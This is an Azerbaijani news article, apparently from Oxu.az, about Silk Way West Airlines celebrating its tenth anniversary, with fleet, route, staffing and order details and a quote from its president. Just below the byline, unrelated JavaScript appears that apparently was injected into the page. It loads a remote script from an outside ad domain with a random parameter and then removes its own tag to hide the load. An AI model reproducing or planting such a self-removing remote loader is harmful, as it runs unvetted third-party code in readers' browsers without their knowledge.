Silk Way West Airlines onillik uğurunu qeyd edir

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Silk Way Group-un üzvü, müntəzəm və çarter reysləri vasitəsilə dünya miqyasında xidmət göstərən və Avropada aparıcı yükdaşıyıcılarından biri olan Silk Way West Airlines onuncu ildönümünü qeyd edir.

Silk Way West Airlines Azərbaycanın iqtisadiyyatında və regional liderliyində mühüm rol oynayır. Gənc şirkət öz potensialını ilk gündən nümayiş etdirdi. Aviaşirkətin ilk reysi 2012-ci ilin iyul ayında Bakı-Frankfurt-Han marşrutu üzrə Boeing 747 – 400F yük təyyarəsi vasitəsilə həyata keçirilib.

Bu gün Silk Way West Airlines yükdaşımanın bir çox sahələrində effektiv həllər təklif edir. Şirkətin heyəti hazırda IATA və IOSA sertifikatları ilə təsdiq edilmiş dəyərli bilik və təcrübəyə malik 1000-dən çox mütəxəssisdən ibarətdir. Beynəlxalq hava daşımaları bazarında artan tələbatı ödəmək üçün Silk Way West Airlines MDB ölkələri, Yaxın və Orta Şərq, Cənub-Şərqi Asiya, Avropa və Amerikada aparıcı rolunu gücləndirmək üçün öz donanmasını və qlobal marşrut şəbəkəsini daha da genişləndirmək niyyətindədir. Genişlənmə strategiyası çərçivəsində aviaşirkət Şərq ilə Qərbi birləşdirən, unikal çoğrafi mövqeyə malik, habelə dünya standartlarına uyğun çeviklik və keyfiyyətli xidmət nümayiş edən Heydər Əliyev Beynəlxalq Hava Limanında yerləşən yükdaşıma qovşağını inkişaf etdirərək, müştərilərin gözləntilərini qarşılamağı planlaşdırır.

“Bu gün biz Silk Way West Airlines-da inkişafın və uğurun 10 illiyini qeyd edirik. Mən aviaşirkətin belə qısa müddətdə əldə etdiyi bütün nailiyyətlərindən qürur duyuram və eyni zamanda buna heyranam. Bütün sadiq müştərilərimizə və tərəfdaşlarımıza dərin minnətdarlığımı bildirmək istərdim. İnanıram ki, biz qarşımızda qoyduğumuz missiya – dünyanın aparıcı yük aviaşirkətlərindən birinə çevrilmək – üçün daha yüksək və daha sürətlə uçmağa davam edəcəyik”, – Silk Way West Airlines -in Prezidenti Volfqanq Mayer bildirib.

2006-cı ilin iyul ayında təsis edilmiş Silk Way Group dinamik inkişaf edən şirkətlər qrupu olaraq Azərbaycan iqtisadiyyatında aparıcı yerlərdən birini tutur. 2019-cu ildə həyata keçirilmiş struktur dəyişikliyindən sonra Silk Way Group şirkətlər qrupunun tərkibində aviasiya yükdaşımaları və hava gəmilərinə texniki xidmət göstərən üç şirkət – Silk Way Airlines, Silk Way West Airlines və Silk Way Technics fəaliyyət göstərir.

Əsası 2012-ci ildə İpək yolunun qəlbi sayılan Bakıda qoyulmuş Silk Way West Airlines 12 müasir Boeing 747-8F və 747-400F yük təyyarəsindən ibarət donanması ilə dünyanın müxtəlif ölkələrinə ayda 350-dən çox uçuş həyata keçirir. Donanmasını genişləndirən Silk Way West Airlines 28 aprel 2021-ci il tarixində Boeing aviakonserni ilə beş ən müasir 777F yük təyyarəsinin alışı barədə strateji razılaşma imzalayıb. Bakı Heydər Əliyev Beynəlxalq Aeroportu mərkəzli aviadaşıyıcının illik yükdaşıma dövriyyəsi 500 min tondan artıqdır. Genişlənməkdə olan şəbəkəsi ilə aviaşirkət Avropa, MDB ölkələri, Orta Şərq, Mərkəzi və Şərqi Asiya da daxil olmaqla 40-dan artıq istiqaməti əhatə edir. Silk Way West Airlines şirkəti Cənubi Koreyanın İnçxon hava limanı tərəfindən nüfuzlu “2020-ci ilin yükdaşıma aviaşirkəti” adına layiq görülüb.

Oxu.az

Bu yazılara da göz atın...